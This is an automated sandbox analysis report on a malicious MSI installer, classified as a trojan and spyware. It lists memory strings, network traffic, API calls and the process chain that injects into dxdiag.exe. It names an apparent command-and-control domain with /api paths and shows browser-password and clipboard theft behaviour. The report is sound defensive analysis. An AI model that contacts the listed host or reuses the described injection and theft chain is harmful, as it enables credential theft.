              Source: dxdiag.exe, 00000006.00000003.2241150379.0000000004A54000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
              Source: dxdiag.exe, 00000006.00000003.2241150379.0000000004A54000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
              Source: dxdiag.exe, 00000006.00000003.2241150379.0000000004A54000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
              Source: dxdiag.exe, 00000006.00000003.2241150379.0000000004A54000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
              Source: dxdiag.exe, 00000006.00000003.2241150379.0000000004A54000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
              Source: dxdiag.exe, 00000006.00000003.2241150379.0000000004A54000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
              Source: dxdiag.exe, 00000006.00000003.2218039986.0000000004A7C000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000006.00000003.2218128011.0000000004A7A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
              Source: dxdiag.exe, 00000006.00000003.2242542138.00000000029AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696484494400800000.2&ci=1696484494189.
              Source: dxdiag.exe, 00000006.00000003.2242542138.00000000029AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696484494400800000.1&ci=1696484494189.12791&cta
              Source: dxdiag.exe, 00000006.00000003.2218039986.0000000004A7C000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000006.00000003.2218128011.0000000004A7A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
              Source: dxdiag.exe, 00000006.00000003.2218039986.0000000004A7C000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000006.00000003.2218128011.0000000004A7A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
              Source: dxdiag.exe, 00000006.00000003.2218039986.0000000004A7C000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000006.00000003.2218128011.0000000004A7A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
              Source: dxdiag.exe, 00000006.00000003.2242542138.00000000029AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/T23eBL4EHswiSaF6kya2gYsRHvdfADK-NYjs1mVRNGE.3351.jpg
              Source: dxdiag.exe, 00000006.00000003.2242542138.00000000029AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
              Source: dxdiag.exe, 00000006.00000003.2218039986.0000000004A7C000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000006.00000003.2218128011.0000000004A7A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
              Source: dxdiag.exe, 00000006.00000003.2218039986.0000000004A7C000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000006.00000003.2218128011.0000000004A7A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
              Source: dxdiag.exe, 00000006.00000003.2218039986.0000000004A7C000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000006.00000003.2218128011.0000000004A7A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
              Source: dxdiag.exe, 00000006.00000003.2295091378.0000000002995000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fixxyplanterv.click/
              Source: dxdiag.exe, 00000006.00000003.2258774051.0000000002982000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fixxyplanterv.click/%a
              Source: dxdiag.exe, 00000006.00000003.2268687272.0000000002990000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fixxyplanterv.click/alS5
              Source: dxdiag.exe, 00000006.00000003.2295091378.0000000002995000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fixxyplanterv.click/api
              Source: dxdiag.exe, 00000006.00000002.2307824056.0000000002916000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000006.00000003.2303635403.0000000002916000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fixxyplanterv.click/apiQ
              Source: dxdiag.exe, 00000006.00000002.2307824056.0000000002916000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000006.00000003.2303635403.0000000002916000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fixxyplanterv.click/apib
              Source: dxdiag.exe, 00000006.00000002.2307824056.0000000002916000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000006.00000003.2303635403.0000000002916000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fixxyplanterv.click/apiuu
              Source: dxdiag.exe, 00000006.00000003.2268687272.0000000002990000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fixxyplanterv.click/ce
              Source: dxdiag.exe, 00000006.00000003.2217619969.0000000002985000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fixxyplanterv.click/d
              Source: dxdiag.exe, 00000006.00000003.2274208940.0000000002995000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000006.00000003.2258750277.0000000002988000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000006.00000002.2308418613.0000000002995000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000006.00000003.2304057412.0000000002995000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000006.00000003.2280230391.0000000002988000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000006.00000003.2279871689.000000000298F000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000006.00000003.2268687272.0000000002990000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000006.00000003.2295091378.0000000002995000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fixxyplanterv.click/ob:6_
              Source: dxdiag.exe, 00000006.00000002.2308418613.0000000002995000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000006.00000003.2304057412.0000000002995000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fixxyplanterv.click/pi
              Source: dxdiag.exe, 00000006.00000003.2242542138.00000000029AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pLk4pqk4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
              Source: dxdiag.exe, 00000006.00000003.2242276188.0000000004B52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
              Source: dxdiag.exe, 00000006.00000003.2242276188.0000000004B52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
              Source: dxdiag.exe, 00000006.00000003.2242542138.00000000029AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_86277c656a4bd7d619968160e91c45fd066919bb3bd119b3
              Source: dxdiag.exe, 00000006.00000003.2218039986.0000000004A7C000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000006.00000003.2218128011.0000000004A7A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
              Source: dxdiag.exe, 00000006.00000003.2218039986.0000000004A7C000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000006.00000003.2218128011.0000000004A7A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
              Source: dxdiag.exe, 00000006.00000003.2242227992.0000000004A50000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.or
              Source: dxdiag.exe, 00000006.00000003.2242227992.0000000004A50000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org
              Source: dxdiag.exe, 00000006.00000003.2242276188.0000000004B52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.bwSC1pmG_zle
              Source: dxdiag.exe, 00000006.00000003.2242276188.0000000004B52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.hjKdHaZH-dbQ
              Source: dxdiag.exe, 00000006.00000003.2242276188.0000000004B52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
              Source: dxdiag.exe, 00000006.00000003.2242542138.00000000029AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.t-mobile.com/cell-phones/brand/apple?cmpid=MGPO_PAM_P_EVGRNIPHN_
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
              Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
              Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
              Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
              Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
              Source: unknownHTTPS traffic detected: 172.67.134.197:443 -> 192.168.2.6:49711 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.134.197:443 -> 192.168.2.6:49717 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.134.197:443 -> 192.168.2.6:49728 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.134.197:443 -> 192.168.2.6:49734 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.134.197:443 -> 192.168.2.6:49741 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.134.197:443 -> 192.168.2.6:49753 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.134.197:443 -> 192.168.2.6:49765 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.134.197:443 -> 192.168.2.6:49781 version: TLS 1.2
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 6_2_004303F0 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,6_2_004303F0
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 6_2_004303F0 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,6_2_004303F0
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 6_2_00431262 GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,6_2_00431262
              Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\5403ef.msiJump to behavior
              Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI602.tmpJump to behavior
              Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI670.tmpJump to behavior
              Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI6FE.tmpJump to behavior
              Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI79B.tmpJump to behavior
              Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI839.tmpJump to behavior
              Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI982.tmpJump to behavior
              Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\inprogressinstallinfo.ipiJump to behavior
              Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\SourceHash{15630F35-AF86-45E7-B3CF-07A0AC07CAF6}Jump to behavior
              Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIACB.tmpJump to behavior
              Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIAEB.tmpJump to behavior
              Source: C:\Windows\System32\msiexec.exeFile deleted: C:\Windows\Installer\MSI602.tmpJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 6_3_028FA4A46_3_028FA4A4
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 6_2_004358706_2_00435870
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 6_2_004159716_2_00415971
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 6_2_004089206_2_00408920
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 6_2_0043CA106_2_0043CA10
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 6_2_0040AAE06_2_0040AAE0
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 6_2_00420B106_2_00420B10
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 6_2_0040E4586_2_0040E458
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 6_2_0043D4006_2_0043D400
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 6_2_004254806_2_00425480
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 6_2_004355306_2_00435530
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 6_2_004386406_2_00438640
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 6_2_0043A7F46_2_0043A7F4
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 6_2_004227B06_2_004227B0
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 6_2_0043D0406_2_0043D040
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 6_2_004148606_2_00414860
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 6_2_004338756_2_00433875
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 6_2_004258006_2_00425800
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 6_2_004258206_2_00425820
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 6_2_0042683C6_2_0042683C
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 6_2_0041D0C06_2_0041D0C0
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 6_2_004230C06_2_004230C0
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 6_2_004238F06_2_004238F0
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 6_2_004039506_2_00403950
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 6_2_0040F1166_2_0040F116
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 6_2_0040E1226_2_0040E122
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 6_2_0040B1246_2_0040B124
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 6_2_004281C06_2_004281C0
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 6_2_0040D9D66_2_0040D9D6
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 6_2_0042A9D56_2_0042A9D5
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 6_2_004061E06_2_004061E0
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 6_2_004181E96_2_004181E9
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 6_2_004231F66_2_004231F6
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 6_2_004059806_2_00405980
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 6_2_004369806_2_00436980
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 6_2_004148606_2_00414860
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 6_2_0043BA706_2_0043BA70
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 6_2_004122006_2_00412200
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 6_2_00426A106_2_00426A10
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 6_2_004192196_2_00419219
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 6_2_0042AAC66_2_0042AAC6
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 6_2_004092D06_2_004092D0
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 6_2_0042AAD76_2_0042AAD7
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 6_2_004082F06_2_004082F0
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 6_2_004362F06_2_004362F0
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 6_2_0041DA806_2_0041DA80
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 6_2_0042AA8A6_2_0042AA8A
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 6_2_00438A906_2_00438A90
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 6_2_004273656_2_00427365
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 6_2_0040FB716_2_0040FB71
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 6_2_004043006_2_00404300
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 6_2_0041BB206_2_0041BB20
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 6_2_0041C3306_2_0041C330
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 6_2_00436BE46_2_00436BE4
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 6_2_00402B906_2_00402B90
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 6_2_004074506_2_00407450
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 6_2_00404C506_2_00404C50
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 6_2_004344636_2_00434463
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 6_2_004154606_2_00415460
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 6_2_00434C706_2_00434C70
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 6_2_00427C0F6_2_00427C0F
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 6_2_0041D4C06_2_0041D4C0
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 6_2_0043CCF06_2_0043CCF0
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 6_2_0041EC806_2_0041EC80
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 6_2_0042E4806_2_0042E480
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 6_2_00416CBD6_2_00416CBD
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 6_2_0042456F6_2_0042456F
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 6_2_00421D736_2_00421D73
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 6_2_00438D706_2_00438D70
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 6_2_00417D746_2_00417D74
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 6_2_00424DD06_2_00424DD0
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 6_2_00405E406_2_00405E40
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 6_2_0041BE716_2_0041BE71
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 6_2_004066706_2_00406670
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 6_2_0040EE706_2_0040EE70
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 6_2_0041CE006_2_0041CE00
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 6_2_00434ED06_2_00434ED0
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 6_2_004216E06_2_004216E0
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 6_2_0043B6F06_2_0043B6F0
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 6_2_00415FA16_2_00415FA1
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 6_2_004177426_2_00417742
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 6_2_00402F506_2_00402F50
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 6_2_0041676A6_2_0041676A
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 6_2_004197106_2_00419710
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 6_2_004117126_2_00411712
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 6_2_0040C72B6_2_0040C72B
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 6_2_004097306_2_00409730
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 6_2_004277E06_2_004277E0
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 6_2_0043B7E06_2_0043B7E0
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 6_2_0042779B6_2_0042779B
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 6_2_00415FA16_2_00415FA1
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 6_2_0041A7A06_2_0041A7A0
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 6_2_0042456F6_2_0042456F
              Source: Joe Sandbox ViewDropped File: C:\Windows\Installer\MSI602.tmp D3614D7BECE53E0D408E31DA7D9B0FF2F7285A7DD544C778847ED0C5DED5D52F
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: String function: 00407FE0 appears 50 times
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: String function: 00414850 appears 77 times
              Source: msit.msiBinary or memory string: OriginalFilenameAICustAct.dllF vs msit.msi
              Source: msit.msiBinary or memory string: OriginalFilenameSoftwareDetector.dllF vs msit.msi
              Source: msit.msiBinary or memory string: OriginalFilenamePrereq.dllF vs msit.msi
              Source: classification engineClassification label: mal100.troj.spyw.evad.winMSI@10/25@1/1
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 6_2_00435870 CoCreateInstance,SysAllocString,CoSetProxyBlanket,SysAllocString,SysAllocString,VariantInit,VariantClear,SysFreeString,SysFreeString,SysFreeString,SysFreeString,GetVolumeInformationW,6_2_00435870
              Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\msitJump to behavior
              Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\TEMP\~DF76783C6014623E29.TMPJump to behavior
              Source: C:\Windows\Installer\MSIAEB.tmpKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: dxdiag.exe, 00000006.00000003.2218290971.0000000004A67000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000006.00000003.2230387144.0000000004A5F000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000006.00000003.2218812673.0000000004A49000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: msit.msiVirustotal: Detection: 57%
              Source: msit.msiReversingLabs: Detection: 55%
              Source: unknownProcess created: C:\Windows\System32\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\msit.msi"
              Source: unknownProcess created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
              Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 031803DE2C6D91C23BF4AB9F8F38A8DE
              Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\Installer\MSIAEB.tmp "C:\Windows\Installer\MSIAEB.tmp"
              Source: C:\Windows\Installer\MSIAEB.tmpProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"
              Source: C:\Windows\Installer\MSIAEB.tmpProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"
              Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 031803DE2C6D91C23BF4AB9F8F38A8DEJump to behavior
              Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\Installer\MSIAEB.tmp "C:\Windows\Installer\MSIAEB.tmp"Jump to behavior
              Source: C:\Windows\Installer\MSIAEB.tmpProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"Jump to behavior
              Source: C:\Windows\Installer\MSIAEB.tmpProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"Jump to behavior
              Source: C:\Windows\System32\msiexec.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\System32\msiexec.exeSection loaded: aclayers.dllJump to behavior
              Source: C:\Windows\System32\msiexec.exeSection loaded: sfc.dllJump to behavior
              Source: C:\Windows\System32\msiexec.exeSection loaded: sfc_os.dllJump to behavior
              Source: C:\Windows\System32\msiexec.exeSection loaded: msi.dllJump to behavior
              Source: C:\Windows\System32\msiexec.exeSection loaded: srpapi.dllJump to behavior
              Source: C:\Windows\System32\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\msiexec.exeSection loaded: tsappcmp.dllJump to behavior
              Source: C:\Windows\System32\msiexec.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\msiexec.exeSection loaded: textinputframework.dllJump to behavior
              Source: C:\Windows\System32\msiexec.exeSection loaded: coreuicomponents.dllJump to behavior
              Source: C:\Windows\System32\msiexec.exeSection loaded: coremessaging.dllJump to behavior
              Source: C:\Windows\System32\msiexec.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Windows\System32\msiexec.exeSection loaded: coremessaging.dllJump to behavior
              Source: C:\Windows\System32\msiexec.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\System32\msiexec.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\System32\msiexec.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\System32\msiexec.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\msiexec.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\msiexec.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\System32\msiexec.exeSection loaded: textshaping.dllJump to behavior
              Source: C:\Windows\System32\msiexec.exeSection loaded: netapi32.dllJump to behavior
              Source: C:\Windows\System32\msiexec.exeSection loaded: wkscli.dllJump to behavior
              Source: C:\Windows\System32\msiexec.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\msiexec.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\msiexec.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\System32\msiexec.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\msiexec.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\msiexec.exeSection loaded: pcacli.dllJump to behavior
              Source: C:\Windows\System32\msiexec.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\System32\msiexec.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\System32\msiexec.exeSection loaded: aclayers.dllJump to behavior
              Source: C:\Windows\System32\msiexec.exeSection loaded: sfc.dllJump to behavior
              Source: C:\Windows\System32\msiexec.exeSection loaded: sfc_os.dllJump to behavior
              Source: C:\Windows\System32\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\msiexec.exeSection loaded: msi.dllJump to behavior
              Source: C:\Windows\System32\msiexec.exeSection loaded: tsappcmp.dllJump to behavior
              Source: C:\Windows\System32\msiexec.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\msiexec.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\msiexec.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\msiexec.exeSection loaded: netapi32.dllJump to behavior
              Source: C:\Windows\System32\msiexec.exeSection loaded: wkscli.dllJump to behavior
              Source: C:\Windows\System32\msiexec.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\msiexec.exeSection loaded: srclient.dllJump to behavior
              Source: C:\Windows\System32\msiexec.exeSection loaded: spp.dllJump to behavior
              Source: C:\Windows\System32\msiexec.exeSection loaded: powrprof.dllJump to behavior
